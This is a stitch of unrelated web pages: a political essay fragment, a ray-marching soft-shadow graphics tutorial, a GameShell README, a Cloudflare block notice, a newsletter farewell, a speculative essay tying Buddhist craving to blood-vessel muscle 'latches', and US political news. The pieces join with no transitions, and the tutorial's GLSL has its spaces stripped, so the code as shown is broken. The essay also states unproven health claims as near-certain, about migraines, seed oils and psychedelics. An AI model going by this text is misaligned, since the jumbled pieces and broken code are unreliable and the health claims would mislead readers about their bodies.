And there is more those of us living in safety can do. We can send funds and share resources, as so many already do. And we can continue heading and supporting Palestinians’ call for boycotts, divestment, and sanctions against Israeli institutions complicit in occupation and apartheid.
Activist sometimes say, “Solidarity begins at home.” Yet not everyone can choose their home. If you have the great fortune of spending the holidays with loved ones who share your commitments to justice and liberation, I hope your time together is full of joy. Most of the time, though, solidarity actually begins anywhere but home. So if you choose to spend time with your family knowing that it will be fraught, I wish you luck. The weekend will pass, and there’s urgent work to be done.
DNS Firewalling with MISP and Technitium DNS Server
Disclaimer: the demos on this page use WebGL features that aren’t available on some mobile devices.
A couple of weeks ago I tweeted a video of a toy graphics project (below). It’s not done, but a lot of people liked it which was surprising and fun! A few people asked how it works, so that’s what this post is about.
Under the hood it uses something called a distance field. A distance field is an image like the one below that tells you how far each pixel is from your shape. Light grey pixels are close to the shape and dark grey pixels are far from it.
When the demo starts up, it draws some text on a 2D canvas and generates a distance field of it. It uses
a library I wrote
that generates distance fields really quickly. If you’re curious how the library works, I wrote about that
here
.
Our lighting scheme works like this: when processing a particular pixel we consider a ray from it to the light, like so…
If the ray intersects a glyph, the pixel we’re shading must be in shadow because there’s something between it and the light.
The simplest way to check this would be to move along the ray in 1px increments, starting from the pixel we’re shading and ending at the light, repeatedly asking the distance field if we’re distance 0 from a shape. This would work, but it’d be really slow.
We could pick some specific length like 30px and move in increments of that size, but then we risk jumping over glyphs that are smaller than 30px. We might think we’re not in shadow when we should be.
Ray marching’s core idea is this: the distance field tells you how far you are from the closest glyph. You can safely advance along your ray by that distance without skipping over any glyphs.
Let’s walk through an example. We start as pictured above and ask the distance field how far we are from any glyph. Turns out in this case that the answer is 95px (pictured left). This means that we can move 95px along our ray without skipping over anything!
Now we’re a little closer to the light. We repeat the process until we hit the ascender of the b! If the b glyph weren’t there, we’d have kept going until we hit the light.
Below is a demo that shows the ray marching steps for a given pixel. The red box is the pixel we’re shading, and each circle along the ray represents a ray marching step and the distance from the scene at that step.
Try dragging the light and the pixel around to build an intuition for it.
Below is GLSL to implement this technique. It assumes you’ve defined a function
getDistance
that samples the distance field.
vec2rayOrigin=...;vec2rayDirection=...;floatrayProgress=0;while(true){if(rayProgress>distance(rayOrigin,lightPosition)){// We hit the light! This pixel is not in shadow.return1.;}floatsceneDist=getDistance(rayOrigin+rayProgress*rayDirection);if(sceneDist<=0.){// We hit a shape! This pixel is in shadow.return0.;}rayProgress+=sceneDist;}
It turns out that some pixels are really expensive to process. So in practice we use a for-loop instead of a while loop – that way we bail out if we’ve done too many steps. A common “slow case” in ray marching is when a ray is parallel to the edge of a shape in the scene…
The approach I’ve described so far will get you a scene that looks like the one below.
It’s cool, but the shadows are sharp which doesn’t look very good. The shadows in the demo look more like this…
One big disclaimer is that they’re not physically realistic! Real shadows look like hard shadows where the edges have been fuzzed. This approach does something slightly different: all pixels that were previously in shadow are still fully in shadow. We’ve just added a penumbra of partially shaded pixels around them.
The upside is that they’re pretty and fast to compute, and that’s what I care about! There are three “rules” involved in computing them.
Rule 1:
The closer a ray gets to intersecting a shape, the more its pixel should be shadowed. In the image below there are two similar rays (their distances to the shape pictured in yellow and green). We want the one that gets closer to touching the corner to be more shadowed.
This is cheap to compute because the variable
sceneDist
tells us how far we are from the closest shape at each ray marching step. So the smallest value of
sceneDist
across all steps is a good approximation for the yellow and green lines in the image above.
Rule 2:
if the pixel we’re shading is far from the point where it almost intersects a shape, we want the shadow to spread out more.
Consider two pixels along the ray above. One is closer to the almost-intersection and is lighter (its distance is the green line). The other is farther and darker (its distance is the yellow line). In general: the further a pixel is from its almost intersection, the more “in shadow” we should make it.
This is cheap to compute because the variable
rayProgress
is the length of the green and yellow lines in the image above.
So: we previously returned
1.0
for pixels that weren’t in shadow. To implement rules 1 and 2, we compute
sceneDist / rayProgress
on each ray marching step, keep track of its minimum value, and return that instead.
vec2rayOrigin=...;vec2rayDirection=...;floatrayProgress=0.;floatstopAt=distance(samplePt,lightPosition);floatlightContribution=1.;for(inti=0;i<64;i++){if(rayProgress>stopAt){returnlightContribution;}// `getDistance` samples our distance field texture.floatsceneDist=getDistance(rayOrigin+rayProgress*rayDirection);if(sceneDist<=0.){// We hit a shape! This pixel is in shadow.return0.;}lightContribution=min(lightContribution,sceneDist/rayProgress);rayProgress+=sceneDist;}// Ray-marching took more than 64 steps!return0.;
This ratio feels kind of magical to me because it doesn’t correspond to any physical value. So let’s build some intuition for it by thinking through why it might take on particular values…
If
sceneDist / rayProgress >= 1
, then either
sceneDist
is big or
rayProgress
is small (relative to each other). In the former case we’re far from any shapes and we shouldn’t be in shadow, so a light value of
1
makes sense. In the latter case, the pixel we’re shadowing is really close to an object casting a shadow and the shadow isn’t fuzzy yet, so a light value of
1
makes sense.
The ratio is
0
only when
sceneDist
is
0
. This corresponds to rays that intersect an object and whose pixels are in shadow.
And here’s a demo of what we have so far…
Rule #3
is the most straightforward one: light gets weaker the further you get from it.
Instead of returning the minimum value of
sceneDist / rayProgress
verbatim, we multiply it by a
distanceFactor
which is
1
right next to the light,
0
far away from it, and gets quadratically smaller as you move away from it.
All together, the code for the approach so far looks like this…
vec2rayOrigin=...;vec2rayDirection=...;floatrayProgress=0.;floatstopAt=distance(samplePt,lightPosition);floatlightContribution=1.;for(inti=0;i<64;i++){if(rayProgress>stopAt){// We hit the light!floatLIGHT_RADIUS_PX=800.;// fadeRatio is 1.0 next to the light and 0. at// LIGHT_RADIUS_PX away.floatfadeRatio=1.0-clamp(stopAt/LIGHT_RADIUS_PX,0.,1.);// We'd like the light to fade off quadratically instead of// linearly.floatdistanceFactor=pow(fadeRatio,2.);returnlightContribution*distanceFactor;}// `getDistance` samples our distance field texture.floatsceneDist=getDistance(rayOrigin+rayProgress*rayDirection);if(sceneDist<=0.){// We hit a shape! This pixel is in shadow.return0.;}lightContribution=min(lightContribution,sceneDist/rayProgress);rayProgress+=sceneDist;}// Ray-marching took more than 64 steps!return0.;
I forget where I found this soft-shadow technique, but I definitely didn’t invent it. Inigo Quilez
has a great post on it
where he talks about using it in 3D.
Inigo’s post also talks about a gotcha with this approach that you might have noticed in the demos above: it causes banding artifacts. This is because Rule 1 assumes that the smallest value of
sceneDist
across all steps is a good approximation for the distance from a ray to the scene. This is not always true because we sometimes take very few ray marching steps.
So in my demo I use an improved approximation that Inigo writes about in his post. I also use another trick that is more effective but less performant: instead of advancing by
sceneDist
on each ray marching step, I advance by something like
sceneDist * randomJitter
where
randomJitter
is between
0
and
1
.
This improves the approximation because we’re adding more steps to our ray march. But we could do that by advancing by
sceneDist * .3
. The random jitter ensures that pixels next to each other don’t end up in the same band. This makes the result a little grainy which isn’t great. But I think looks better than banding… This is an aspect of the demo that I’m still not satisfied with, so if you have ideas for how to improve it please tell me!
Overall my demo has a few extra tweaks that I might write about in future but this is the core of it. Thanks for reading! If you have questions or comments, let me know
on Twitter
.
Thank you to Jessica Liu, Susan Wang, Matt Nichols and Kenrick Rilee for giving feedback on early drafts of this post! Also, if you enjoyed this post you might enjoy working with me at
Figma
!
Teaching first-year university students or high schoolers to use a Unix shell
is not always the easiest or most entertaining of tasks. GameShell was devised
as a tool to help students at the
Université Savoie Mont Blanc
to engage with a
real
shell, in a way that encourages learning while also having fun.
The original idea, due to Rodolphe Lepigre, was to run a standard bash session
with an appropriate configuration file that defined "missions" which would be
"checked" in order to progress through the game.
Here is the result...
GameShell is available in English, French and Italian.
Feel free to send us your remarks, questions or suggestions by opening
issues
or submitting
pull requests
.
We are particularly interested in any new missions you might create!
Getting started
GameShell should work on any standard Linux system, and also on macOS and BSD
(but we have run fewer tests on the latter systems). On Debian or Ubuntu, the
only dependencies (besides
bash
) are the
gettext-base
and
awk
packages
(the latter is generally installed by default). Some missions have additional
dependencies: these missions will be skipped if the dependencies are not met.
On Debian or Ubuntu, run the following command to install all game and mission
dependencies.
The first command will download the latest version of the game in the form of
a self-extracting archive, and the second command will initialise and run the
game from the downloaded archive. Instructions on how to play are provided in
the game directly.
Note that when you quit the game (with
control-d
or the command
gsh exit
)
your progression will be saved in a new archive (called
gameshell-save.sh
).
Run this archive to resume the game where you left it.
If you prefer not running foreign shell scripts on your computer, you can
generate a Docker image with the following:
The game will NOT be saved when you exit, and additional flags are required if
you want to run X programs from inside GameShell. Refer to
this
section
of the user
manual.
Documentation
To find out more about GameShell, refer to the following documents:
The
user manual
provides information on how to run the
game on all supported platforms (Linux, macOS, BSD), explains how to run the
game from the sources, tells you how to generate custom game archives (which
is useful if you want to use GameShell for teaching a class), and more.
The
developer manual
provides information on how to
create new missions, how to translate missions, and how to participate
in the development of the game.
This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
What can I do to resolve this?
You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.
Sadly, we have to inform you that this is the last issue of “ECMAScript News”. We have been operating at a loss for too long: The number of advertisers and subscribers has been slowly but steadily decreasing over the last two years (vs. constant growth before that). Therefore, we made the difficult decision to stop publishing this newsletter.
The first issue came out on 2016-09-27. We published a total of 368 issues and are thankful for many loyal readers during many interesting years!
Axel may continue this newsletter in some shape or form next year. If he does, he’ll inform you via one last email in 2026.
A unification of Buddhist phenomenology, active inference, and physical reflexes; a practical theory of suffering, tension, and liberation; the core mechanism for medium-term memory and Bayesian updating; a clinically useful dimension of variation and dysfunction; a description of sensory type safety; a celebration of biological life.
Michael Edward Johnson, Symmetry Institute, July 12, 2023.
I. What is tanha?
By default, the brain tries to grasp and hold onto pleasant sensations and push away unpleasant ones. The Buddha called these ‘micro-motions’ of greed and aversion
taṇhā
, and the Buddhist consensus seems to be that it accounts for an amazingly large proportion (~90%) of suffering.
Romeo Stevens
suggests translating the original Pali term as “fused to,” “grasping,” or “clenching,” and that the mind is trying to make sensations feel
stable, satisfactory, and controllable
. Nick Cammarata suggests “
fast grabby thing
” that happens within ~100ms after a sensation enters awareness; Daniel Ingram suggests this ‘grab’ can occur as quickly as 25-50ms (personal discussion). Uchiyama Roshi describes tanha in terms of its cure, “
opening the hand of thought
”; Shinzen Young suggests “
fixation
”; other common translations of tanha are “
desire
,” “thirst,” “craving.” The vipassana doctrine is that tanha is something the mind instinctively does, and that meditation helps you
see this process
as it happens, which allows you to stop doing it. Shinzen estimates that his conscious experience is
literally 10x better
due to having a satisfying meditation practice.
Tanha is not yet a topic of study in affective neuroscience but I suggest it should be. Neuroscience is generally gated by soluble important mysteries: complex dynamics often arise from complex mechanisms, and complex mechanisms are difficult to untangle. The treasures in neuroscience happen when we find
exceptions
to this rule: complex dynamics that arise from elegantly simple core mechanisms. When we find one it generally leads to breakthroughs in both theory and intervention. Does “tanha” arise from a simple or complex mechanism? I believe
Buddhist phenomenology
is very careful about what it calls
dependent origination
— and this makes items that Buddhist scholarship considers to be ‘basic building-blocks of phenomenology’ particularly likely to have a simple, elegant implementations in the brain — and thus are exceptional mysteries to focus scientific attention on.
I don’t think tanha has 1000 contributing factors; I think it has one crisp, isolatable factor. And I think if we find this factor, it could herald a reorganization of systems neuroscience similar in magnitude to the past shifts of
cybernetics
, predictive coding, and
active inference
.
The first clue is what tanha is trying to do for us. I’ll claim today that tanha is a side-effect of a normal, effective strategy our brains use extensively,
active inference
. Active inference suggests we impel ourselves to action by first creating some predicted sensation (“I have a sweet taste in my mouth” or “I am not standing near that dangerous-looking man”) and then holding it until we act in the world to make this prediction
become true
(at which point we can release the tension). Active inference argues
we store our to-do list as predictions
, which are equivalent to untrue sensory observations that we act to make true.
Formally, the “tanha as unskillful active inference” (TUAI) hypothesis is that this process commonly goes awry (i.e. is applied unskillfully) in three ways:
First, the rate of generating normative predictions can outpace our ability to make them true and overloads a very finite system. Basically we try to control too much, and stress builds up.
Second, we generate normative predictions in domains that we
cannot possibly control
; predicting a taste of cake will linger in our mouth forever, predicting that we did not drop our glass of water on the floor. That good sensations will last forever and the bad did not happen. (This is essentially a “predictive processing” reframe of the story Romeo Stevens has told on his
blog
,
Twitter
, and in person.)[1]
Third, there may be a
context
desynchronization
between the system that represents the world model, and the system that maintains predictions-as-operators on this world model. When
desynchronization
happens and the
basis
of the world model shifts in relation to the basis of the predictions, predictions become nonspecific or
nonsensical
noise and stress.
We may also include a catch-all fourth category for when the prediction machinery becomes altered outside of any semantic context, for example metabolic insufficiency leading to impaired operation.
Core resources:
Safron, A. (2020).
An Integrated World Modeling Theory (IWMT) of Consciousness
: Combining Integrated Information and Global Neuronal Workspace Theories With the Free Energy Principle and Active Inference Framework; Toward Solving the Hard Problem and Characterizing Agentic Causation. Frontiers in Artificial Intelligence, 3. https://doi.org/10.3389/frai.2020.00030
Friston, K., FitzGerald, T., Rigoli, F., Schwartenbeck, P., Pezzulo, G. (2017).
Active inference: A Process Theory
. Neural Computation, 29(1), 1-49.
At high frequencies these SOHMs will act as feature detectors, at lower frequencies we might think of them as wind chimes: by the presence and absence of particular SOHMs and their interactions we obtain a subconscious feeling about what kind of environment we’re in and where its rewards and dangers are. We can expect SOHMs will be arranged in a way that optimizes differentiability of possible/likely world states,
minimizes crosstalk
, and in aggregate constitutes a
world model
, or in the
Neural Annealing
/
REBUS
/
ALBUS
framework, a belief landscape.
To be in tanha-free “
open awareness
” without greed, aversion, or expectation is to feel the undoctored hum of your SOHMs. However, we doctor our SOHMs *all the time* — when a nice sensation enters our awareness, we reflexively try to ‘grab’ it and stabilize the resonance; when something unpleasant comes in, we try to push away and deaden the resonance. Likewise society puts expectations on us to “
act normal
” and “
be useful
”; we may consider all such SOHM adjustments/predictions as drawing from the same finite resource pool. “Active SOHM management” is effortful (and unpleasant) in rough proportion to how many SOHMs need to be actively managed and how long they need to be managed.
But how can the brain manage SOHMs? And if the Buddhists are right and this creates suffering, why does the brain even try?
Core resources:
Safron, A. (2020).
An Integrated World Modeling Theory (IWMT) of Consciousness
: Combining Integrated Information and Global Neuronal Workspace Theories With the Free Energy Principle and Active Inference Framework; Toward Solving the Hard Problem and Characterizing Agentic Causation. Frontiers in Artificial Intelligence, 3. https://doi.org/10.3389/frai.2020.00030
I propose reframing tanha as an artifact of the brain’s
compression pressure
. I.e. tanha is an artifact of a continual process that subtly but systematically pushes on the complexity of ‘what is’ (the neural patterns represented by undoctored SOHMs) to collapse it into a more simple configuration, and sometimes holds it there until we act to make that simplification true. The result of this compression drive conflates “what is”, “what could be”, “what should be”, and “what will be,” and this conflation is the source of no end of moral and epistemological confusion.
This reframes tanha as both the pressure which collapses complexity into simplicity, and the ongoing stress that comes from maintaining the counterfactual aspects of this collapse (
compression stress
). We can think of this process as balancing two costs: on one hand, applying compression pressure has metabolic and epistemic costs, both immediate and ongoing. On the other hand, the brain is a finite system and if it doesn’t continually “compress away” patterns there will be unmanageable sensory chaos. The right amount of compression pressure is not zero.[2]
Equivalently, we can consider tanha as an excessive forcefulness in the metabolization of uncertainty. Erik P. Hoel has written about energy, information, and uncertainty as equivalent and conserved quantities (
Hoel 2020
):
much like literal digestion
, the imperative of the nervous system is to extract value from sensations then excrete the remaining information, leaving a low-information, low-uncertainty, clean slate ready for the next sensation (thank you Benjamin Anderson for discussion). However, we are often unskillful in the ways we try to extract value from sensations, e.g. improperly assessing context, trying to extract too much or too little certainty, or trying to extract forms of certainty inappropriate for the sensation.
We can define a person’s personality, aesthetic, and a large part of their phenomenology in terms of how they metabolize uncertainty — their library of motifs for (a) initial probing, (b) digestion and integration, and (c) excretion/externalization of any waste products, and the particular reagents for this process they can’t give themselves and
must
seek in the world
.
So far we’ve been discussing brain dynamics on the computational level. But
how
does the brain do all this — what is the
mechanism
by which it attempts to apply compression pressure to SOHMs? This is essentially the question neuroscience has been asking for the last decade. I believe evolution has coupled two very different systems together to selectively apply compression/prediction pressure in a way that preserves the perceptive reliability of the underlying system (undoctored SOHMs as ground-truth perception) but allows near-infinite capacity for adjustment and hypotheticals. One system focused on perception; one on compression, judgment, planning, and action.
The traditional neuroscience approach for locating these executive functions has been to associate them with particular areas of the brain. I suspect the core logic is hiding much closer to the action.
Above: the vertical section of an artery wall (Wikipedia, emphasis added;
video
): the physical mechanism by which we grab sensations and make predictions; the proximate cause of 90% of suffering and 90% of goal-directed behavior.
All blood vessels are wrapped by a thin sheathe of vascular smooth muscle cells (
VSMCs
). The current scientific consensus has the vasculature system as a spiderweb of ever-narrower channels for blood, powered by the heart as a central pump, and supporting systems such as the brain, stomach, limbs, and so on by bringing them nutrients and taking away waste. The sheathe of muscle wrapped around blood vessels undulates in a process called “
vasomotion
” that we think helps blood keep circulating, much like peristalsis in the gut helps keep food moving, and can help adjust blood pressure.
I think all this is true, but is also a product of what’s been easy to measure and misses 90% of what these cells do.
Evolution works in layers, and the most ancient base layers often have rudimentary versions of more specialized capacities (
Levin 2022
) as well as deep control hooks into newer systems that are built around them. The vascular system actually predates neurons and has co-evolved with the nervous system for hundreds of millions of years. It also has mechanical actuators (VSMCs) that have physical access to all parts of the body and can flex in arbitrary patterns and rhythms. It would be extremely surprising if evolution didn’t use this system for something more than plumbing. We can also “follow the money”; the vascular system controls the nutrients and waste disposal for the neural system and will win in any heads-up competition over co-regulation balance.
I expect VSMC contractions to influence nearby neurons through e.g. ephaptic coupling, reducing blood flow, and adjusting local physical resonance, and to be triggered by local dissonance in the electromagnetic field.
I’ll offer three related hypotheses about the computational role of VSMCs[3] today that in aggregate constitute a neural regulatory paradigm I’m calling
vasocomputation
:
Compressive Vasomotion Hypothesis (CVH)
: the vasomotion reflex functions as a compression sweep on nearby neural resonances, collapsing and merging fragile ambivalent patterns (the “Bayesian blur” problem) into a more durable, definite state. Motifs of vasomotion, reflexive reactions to uncertainties, and patterns of tanha are equivalent.
Vascular Clamp Hypothesis (VCH)
: vascular contractions freeze local neural patterns and plasticity for the duration of the contraction, similar to collapsing a superposition or probability distribution, clamping a harmonic system, or pinching a critical network into a definite circuit. Specific vascular constrictions correspond with specific predictions within the Active Inference framework and function as medium-term memory.
Latched Hyperprior Hypothesis (LHH)
: if a vascular contraction is held long enough, it will engage the
latch-bridge mechanism
common to smooth muscle cells. This will durably ‘freeze’ the nearby circuit, isolating it from conscious experience and global updating and leading to a much-reduced dynamical repertoire; essentially creating a durable commitment to a specific hyperprior. The local vasculature will unlatch once the prediction the latch corresponds to is resolved, restoring the ability of the nearby neural networks to support a larger superposition of possibilities.
The initial contractive sweep jostles the neural superposition of interpretations into specificity; the contracted state temporarily freezes the result; if the contraction is sustained, the latch bridge mechanism engages and cements this freeze as a hyperprior. With one motion the door of possibility slams shut. And so we collapse our world into something less magical but more manageable, one clench at a time.
Tanha is cringe.
The claim relevant to the
Free Energy Principle – Active Inference
paradigm is we can productively understand the motifs of smooth muscle cells (particularly in the vascular system) as “where the brain’s top-down predictive models are hiding,” which has been an open mystery in FEP-AI. Specific predictions are held as vascular tension, and vascular tension in turn is released by action, consolidated by
Neural Annealing
, or rendered superfluous by neural remodeling (hold a pattern in place long enough and it becomes the default). Phrased in terms of the
Deep CANALs
framework which imports ideas from machine learning: the neural weights that give rise to SOHMs constitute the learning landscape, and SOHMs+vascular tension constitute the inference landscape.
The claim relevant to Theravada Buddhism is we can productively understand the motifs of the vascular system as the means by which we attempt to manipulate our sensations. Vasomotion corresponds to an attempt to ‘pin down’ a sensation (i.e. tanha); muscle contractions freeze patterns; smooth muscle latches block out feelings of possibility and awareness of that somatic area. Progress on the contemplative path will correspond with both using these forms of tension less, and needing them less. I expect cessations to correspond with a nigh-complete absence of vasomotion (and EEG may measure vasomotion moreso than neural activity).
The claim relevant to practical health is that smooth muscle tension, especially in VSMCs, and especially latched tension, is a system science knows relatively little about but is involved in an incredibly wide range of problems, and understanding this system is hugely helpful for knowing how to take care of yourself and others. The “latch-bridge” mechanism is especially important, where smooth muscle cells have a discrete state where they attach their myosin heads to actin in a way that “locks” or “latches” the tension without requiring ongoing energy. Latches take between seconds to minutes to form & dissolve — a simple way to experience the latch-bridge cycle releasing is to have a hot bath and notice waves of muscle relaxation. Latches can persist for minutes, hours, days, months, or years (depending on what prediction they’re stabilizing), and the sum total of all latches likely accounts for the majority of bodily suffering. If you are “holding tension in your body” you are subject to the mechanics of the latch-bridge mechanism. Migraines and cluster headaches are almost certainly inappropriate VSMC latches; all hollow organs are surrounded by smooth muscle and can latch. A long-term diet of poor food (e.g. seed oils) leads to random latch formation and “lumpy” phenomenology. Sauna + cold plunges are an effective way to force the clench-release cycle and release latches; likewise, simply taking time to feel your body and put your attention into latched tissues can release them. Psychedelics can force open latches. Many issues in neuropathy & psychiatry are likely due to what I call “latch spirals” — a latch forms, which reduces blood flow to that area, which reduces energy available to those tissues, which prevents the latch from releasing (since releasing the latch requires activation energy and returning to a freely cycling state also increases the cell’s rate of energy expenditure).
To summarize the story so far
: tanha is a grabby reflex which is the source of most moment-by-moment suffering. The ‘tanha as unskillful active inference’ (TUAI) hypothesis suggests that we can think of this “grabbing” as part of the brain’s normal predictive and compressive sensemaking, but by default it makes many unskillful predictions that can’t possibly come true and must hold in a costly way. The vascular clamp hypothesis (VCH) is that we store these predictions (both skillful and unskillful) in vascular tension. The VCH can be divided into three distinct hypotheses (CVH, VCH, LHH) that describe the role of this reflex at different computational and temporal scales. An important and non-obvious aspect of smooth muscle (e.g. VSMCs) is they have a discrete “latch” setting wherein energy usage and flexibility drops significantly, and sometimes these latches are overly ‘sticky’; unlatching our sticky latches is a core part of the human condition.
Concluding Part I
: the above work describes a bridge between three distinct levels of abstraction: a central element in Buddhist phenomenology, the core accounting system within active inference, and a specific muscular reflex. I think this may offer a functional route to synthesize the FEP-AI paradigm and Michael Levin’s distributed stress minimization work, and in future posts I plan to explore why this mechanism has been overlooked, and how its dynamics are intimately connected with human problems and capacities.
I view this research program as integral to both human flourishing and AI alignment.
Acknowledgements
: This work owes a great deal to Romeo Stevens’
scholarship on tanha
, pioneering tanha as a ‘clench’ dynamic, intuitions about
muscle tension and prediction
, and notion that we commit to dukkha ourselves until we get what we want; Nick Cammarata’s
fresh perspectives
on Buddhism and his tireless and generative inquiry around the phenomenology & timescale of
tanha
; Justin Mares’ gentle and persistent encouragement; Andrea Bortolameazzi’s many thoughtful comments and observations about the path, critical feedback, and thoughtful support; and Adam Safron’s steadfast belief and support, theorizing on SOHMs, and teachings about predictive coding and active inference. Much of my knowledge of Buddhist psychology comes from the work and teachings of Anthony Markwell; much of my intuition around tantra and interpersonal embodiment dynamics comes from Elena Selezneva. I’m also grateful for conversations with Benjamin Anderson about emergence, to Curran Janssens for supporting my research, and to Ivanna Evtukhova for starting me on the contemplative path. An evergreen thank you to my parents their unconditional support. Finally, a big thank-you to Janine Leger and Vitalik Buterin’s Zuzalu co-living community for creating a space to work on this writeup and make it real.
Footnotes
:
[1] We might attempt to decompose the Active Inference – FEP term of ‘precision weighting’ as (1) the amount of
sensory clarity
(the amount of precision available in stimuli), and (2) the amount of ‘grabbiness’ of the compression system (the amount of precision we empirically try to extract). Perhaps we could begin to put numbers on tanha by calculating the
KL divergence
between these distributions.
[2] We can speculate that the arrow of compression points away from Buddhism’s three attributes: e.g. the brain tries to push and prod its SOHMs toward patterns that are stable (dissonance minimization), satisfactory (harmony maximization), and controllable (compression maximization) — similar yet subtly distinct targets. Thanks to both Romeo and Andrea for discussion about the three attributes and their opposite.
[3] (Added July 19, 2023) Skeletal muscle, smooth muscle, and fascia (which contains myofibroblasts with actin fibers similar to those in muscles) are all found throughout the body and reflexively distribute physical load; it’s likely they do the same for cognitive-emotional load. Why focus on VSMCs in particular? Three reasons: (1) they have the best physical access to neurons, (2) they regulate bloodflow, and (3) they have the latch-bridge mechanism. I.e. skeletal, non-VSMC smooth muscle, and fascia all likely contribute significantly to
distributed stress minimization
, and perhaps do so via similar principles/heuristics, but VSMCs seem to be the only muscle with means, motive, and opportunity to finely puppet the neural system, and I believe are indispensably integrated with its moment-by-moment operation in more ways than are other contractive cells. (Thanks to
@askyatharth
for bringing up fascia.)
Edit, April 6th, 2025:
a friendly Buddhist scholar suggests that common translations of taṇhā conflate two concepts: taṇhā in Pali is most accurately translated as craving or thirst, whereas the act of clinging itself is “upādāna (as in the upādāna-khandhās), and in the links of dependent origination is one step downstream from the thirst (or impulsive craving) of taṇhā.” Under this view we can frame taṇhā as a particular default bias in the
computational-biochemical tuning
of the human nervous system, and upādāna as the impulsive physical (VSMC) clenching this leads to.
Buddhism describes taṇhā as being driven by the three fundamental defilements, greed, fear, & delusion; I expect each defilement maps to a hard truth (aka clearly suboptimal but understandable failure mode) of implementing vasocomputation-based active inference systems.
Sanders, Warren Help Form Senate Democratic ‘Fight Club’ Challenging Schumer’s Leadership
Portside
portside.org
2025-11-27 05:49:27
Sanders, Warren Help Form Senate Democratic ‘Fight Club’ Challenging Schumer’s Leadership
Mark Brody
Thu, 11/27/2025 - 00:49
...
Sanders, Warren Help Form Senate Democratic ‘Fight Club’ Challenging Schumer’s Leadership
Published
Senators Bernie Sanders and Elizabeth Warren | CNN
Angered by the Democratic leadership’s fecklessness and lack of a bold vision for the future, a group of senators including
Bernie Sanders
of
Vermont
and
Elizabeth Warren
of Massachusetts has formed an alliance to push back on Senate Minority Leader
Chuck Schumer
and the party’s campaign arm ahead of next year’s critical
midterm elections
.
The existence of the group, known as the “Fight Club,” was first revealed Monday by the
New York Times
, which
reported
that the senators are pressing the
Democratic Party
to “embrace candidates willing to challenge entrenched corporate interests, fiercely oppose the
Trump administration
, and defy their own party’s orthodoxy.”
Sens. Chris Van Hollen of Maryland, Tina Smith of Minnesota, and
Chris Murphy
of Connecticut are also members of the alliance, and other senators—including
Ed Markey
of Massachusetts and
Jeff Merkley
of Oregon—have taken part in group actions, according to the
Times
.
“The coalition of at least half a dozen senators... is unhappy with how Mr. Schumer and his fellow senator from New York,
Kirsten Gillibrand
, the head of Senate Democrats’ campaign arm, have chosen, recruited and, they argue, favored candidates aligned with the establishment,” the newspaper reported. “The party’s campaign arm, the Democratic Senatorial Campaign Committee, has not made any formal endorsements in contested primaries. However, the senators are convinced that it is quietly signaling support for and pushing donors toward specific Senate candidates: Rep. Angie Craig in Minnesota, Rep. Haley Stevens in Michigan, and Gov. Janet Mills in
Maine
.”
Members of the “Fight Club” have endorsed Minnesota Lt. Gov. Peggy Flanagan’s bid for
US Senate
. In addition to Flanagan, Sanders has backed Abdul El-Sayed’s US Senate run in Michigan and Graham Platner’s campaign to unseat Republican Sen.
Susan Collins
in Maine.
News of the “Fight Club” alliance comes after a small group of centrist Democrats, with Schumer’s tacit blessing,
capitulated
to President
Donald Trump
and
Republicans
earlier this month by agreeing to end the government shutdown without an extension of
Affordable Care Act
subsidies, even as health insurance premiums skyrocket nationwide.
The cave sparked widespread fury, much of it directed at Schumer. Indivisible, a progressive advocacy group that typically aligns with Democrats, has
said
it will not support any Senate Democratic primary candidate who does not call on Schumer to step down as minority leader.
“We must turn the page on this era of cowardice,” Indivisible said following Senate Democrats’ capitulation. “We must nominate and elect Democratic candidates who have an actual backbone. And we must ensure that the kind of failed leadership we see from Sen. Schumer does not doom a future Democratic majority.”
Thus far, no sitting member of the Senate Democratic caucus has demanded Schumer’s resignation. But the emergence of the “Fight Club” is the latest evidence that the Democratic leader’s support is beginning to crumble.
“Absolutely love to see this,” progressive strategist Robert Cruickshank wrote on
social media
in response to the
Times
reporting. “So glad there are some Senate Dems willing to fight back.”
Jake Johnson is a senior editor and staff writer for Common Dreams.
20 States Sue the Trump Administration Over Cuts to Homeless Permanent Housing Funding
Portside
portside.org
2025-11-27 05:34:55
20 States Sue the Trump Administration Over Cuts to Homeless Permanent Housing Funding
Mark Brody
Thu, 11/27/2025 - 00:34
...
The new conditions placed on the program would also give HUD the ability to deny funding for organizations that acknowledge the existence of transgender or nonbinary individuals.
“Communities across the country depend on Continuum of Care funds to provide housing and other resources to our most vulnerable neighbors,” said James in a press release. “These funds help keep tens of thousands of people from sleeping on the streets every night. I will not allow this administration to cut off these funds and put vital housing and support services at risk.”
The coalition of mainly Democratic-led states argues
in the lawsuit
that HUD’s new conditions on the funding are “unlawful and unconstitutional,” alleging that the administration “cannot impose its own conditions on funds that Congress mandated should be distributed based solely on need.”
The lawsuit accuses the Trump administration of violating the Administrative Procedure Act and Congress’ “constitutional power to control spending.”
“HUD is dismayed that the plaintiffs have chosen to misuse the Courts and pursue this delaying tactic to serve their own personal political agenda at the expense of the homeless individuals, youth and families now living on our Nation’s streets. Their use of the courts for political means seeks to prevent nearly $4 billion of aid to flow nationwide to assist those in need. HUD intends to mount a vigorous defense to this meritless legal action,” the spokesperson said in a statement.
The case was filed in the U.S. District Court for the District of Rhode Island and will be decided by Judge Mary S. McElroy, who was appointed by President Donald Trump in 2019 but first nominated by former President Barack Obama.
Earlier this month, HUD imposed a cap on the amount of program funds that can support permanent housing. Previously, there was not a specific limit and around 90 percent of funds supported permanent housing. Under the new cap, no more than 30 percent of these funds can support permanent housing.
HUD Secretary Scott Turner has argued that the policy change is a necessary shift from what the Trump administration considers to be a failed “housing first” model that prioritizes permanent housing without preconditions, such as getting a job or seeking treatment. The agency has said the current policy has fueled a “homeless industrial complex” and does not address the root causes of homelessness.
“What we’ve done is take this Biden-era slush fund, called the Continuum of Care, and turned it into not just housing, but also treatment and transitional housing,” Turner said on Fox Business last week.
The funding cuts could put 170,000 people at risk of experiencing homelessness, according to internal HUD documentation previously obtained by POLITICO. HUD has maintained that the changes will include specific protections for children, veterans and seniors.
Different factions of lawmakers have sent letters to the agency with multiple requests, including extending funding for CoC projects expiring in 2026, reversing the policy changes or answering various questions about implementation.
Additionally, 1,001 national, state and local organizations
sent a letter to Congress
on Monday urging that lawmakers include language directing HUD to renew all existing CoC program grants expiring in 2026 for a full year in the upcoming Transportation-Housing and Urban Development appropriations bill.
A group of 22 House Republicans asked for the same one-year funding extension
in a letter to the agency
earlier this month.
